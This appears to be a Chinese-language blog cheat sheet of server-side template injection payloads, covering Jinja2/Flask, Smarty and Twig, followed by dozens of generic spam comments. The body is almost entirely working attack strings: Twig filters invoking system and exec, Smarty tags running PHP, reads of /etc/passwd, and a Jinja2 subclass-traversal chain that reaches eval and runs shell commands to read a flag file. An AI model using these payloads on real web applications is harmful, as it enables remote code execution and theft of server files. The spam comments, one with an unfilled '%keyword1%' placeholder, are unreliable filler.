基本判断
flask/jinja
__dict__ 保存类实例或对象实例的属性变量键值对字典
__class__ 返回类型所属的对象
__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__bases__ 返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__ 类的初始化方法
__globals__ 对包含函数全局变量的字典的引用Smarty
以下内容出自Smarty SSTI
1、{php}{/php}
Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用
2、{literal}
{literal}可以让一个模板区域的字符原样输出。这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析。
那么对于php5的环境我们就可以使用
<script language="php">phpinfo();</script>
3、{if}
Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用,如||,or,&&,and,is_array(), 等等
{if phpinfo()}{/if}
4、getStreamVariable
新版本失效{self::getStreamVariable("file:///etc/passwd")}
twig
文件读取
{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
rce
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['cat /etc/passwd']|filter('system')}}
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
Web_python_template_injection
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("cat fl4g").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}通过执行shell命令就行了
文章有(39)条网友点评
Pretty nice post. I just stumbled upon your blog and wanted to say that I have really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon!
Wonderful site you have here but I was curious about if you knew of any discussion boards that cover the same topics talked about in this article? I’d really love to be a part of online community where I can get comments from other knowledgeable individuals that share the same interest. If you have any recommendations, please let me know. Many thanks!
We are a group of volunteers and starting a new scheme in our community. Your site provided us with valuable information to work on. You have done an impressive job and our whole community will be grateful to you.
A fascinating discussion is worth comment. I believe that you ought to write more on this subject, it might not be a taboo subject but generally people do not speak about such subjects. To the next! Many thanks!!
Wow, this post is good, my sister is analyzing such things, so I am going to let know her.
Hey! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any recommendations?
Have you ever considered about including a little bit more than just your articles? I mean, what you say is fundamental and all. However just imagine if you added some great pictures or video clips to give your posts more, “pop”! Your content is excellent but with images and clips, this website could certainly be one of the very best in its niche. Excellent blog!
I’ve read several good stuff here. Definitely worth bookmarking for revisiting. I wonder how much attempt you put to create this type of magnificent informative web site.
Yes! Finally something about %keyword1%.
Thank you a bunch for sharing this with all folks you really recognize what you are talking approximately! Bookmarked. Please also seek advice from my web site =). We will have a link change agreement among us
It’s very trouble-free to find out any topic on net as compared to books, as I found this piece of writing at this website.
Fantastic beat ! I wish to apprentice while you amend your web site, how can i subscribe for a blog site? The account aided me a acceptable deal. I had been tiny bit acquainted of this your broadcast provided bright clear concept
I visited multiple sites except the audio quality for audio songs present at this web site is truly wonderful.
Hey There. I found your blog using msn. This is an extremely well written article. I will be sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely comeback.
shgovj
What’s up friends, its great piece of writing regarding educationand fully explained, keep it up all the time.
Useful info. Fortunate me I found your site by accident, and I am stunned why this coincidence did not happened in advance! I bookmarked it.
What’s up mates, good article and nice arguments commented here, I am in fact enjoying by these.
Hi it’s me, I am also visiting this web site regularly, this website is actually nice and the users are in fact sharing pleasant thoughts.
Hey there, You have performed an excellent job. I will definitely digg it and individually recommend to my friends. I am sure they will be benefited from this web site.
Hi there great blog! Does running a blog similar to this take a lot of work? I have very little expertise in computer programming but I was hoping to start my own blog soon. Anyway, if you have any recommendations or tips for new blog owners please share. I know this is off topic but I just needed to ask. Thanks!
If you want to improve your familiarity simply keep visiting this web site and be updated with the latest news posted here.
Thank you, I have recently been searching for information approximately this topic for a while and yours is the best I have found out so far. However, what about the conclusion? Are you sure concerning the source?
Yesterday, while I was at work, my sister stole my iphone and tested to see if it can survive a forty foot drop, just so she can be a youtube sensation. My iPad is now broken and she has 83 views. I know this is completely off topic but I had to share it with someone!
It’s nearly impossible to find educated people on this topic, but you sound like you know what you’re talking about! Thanks
Its like you read my mind! You seem to understand so much approximately this, like you wrote the e-book in it or something. I think that you simply could do with some p.c. to pressure the message house a bit, however other than that, this is magnificent blog. A great read. I’ll definitely be back.
When I originally commented I seem to have clicked the -Notify me when new comments are added- checkbox and now each time a comment is added I get four emails with the same comment. Perhaps there is a means you can remove me from that service? Thanks!
No matter if some one searches for his required thing, thus he/she needs to be available that in detail, thus that thing is maintained over here.
My spouse and I stumbled over here coming from a different website and thought I might check things out. I like what I see so now i am following you. Look forward to looking over your web page again.
I’ve read several just right stuff here. Definitely worth bookmarking for revisiting. I wonder how much attempt you put to create any such great informative web site.
Outstanding quest there. What occurred after? Good luck!
I like the valuable information you provide in your articles. I will bookmark your weblog and check again here frequently. I am quite certain I will learn a lot of new stuff right here! Good luck for the next!
Have you ever considered about including a little bit more than just your articles? I mean, what you say is fundamental and all. However just imagine if you added some great graphics or video clips to give your posts more, “pop”! Your content is excellent but with images and clips, this website could undeniably be one of the greatest in its niche. Terrific blog!
At this moment I am going away to do my breakfast, after having my breakfast coming again to read additional news.
Howdy! I could have sworn I’ve been to this website before but after browsing through some of the posts I realized it’s new to me. Nonetheless, I’m definitely happy I found it and I’ll be bookmarking it and checking back regularly!
Hi there, yeah this article is genuinely good and I have learned lot of
things from it regarding blogging. thanks.
Hi, i feel that i noticed you visited my website thus i came to go back the choose?.I am trying to
in finding things to improve my web site!I assume its ok to
use a few of your concepts!!
Thanks for your personal marvelous posting! I certainly enjoyed reading it, you might be a great author.I will
always bookmark your blog and definitely will come back later on. I want to encourage you to definitely
continue your great writing, have a nice day!
I loved as much as you will receive carried out right here.
The sketch is tasteful, your authored subject matter stylish.
nonetheless, you command get got an nervousness over that you wish be delivering the following.
unwell unquestionably come further formerly again as exactly the same nearly a
lot often inside case you shield this increase.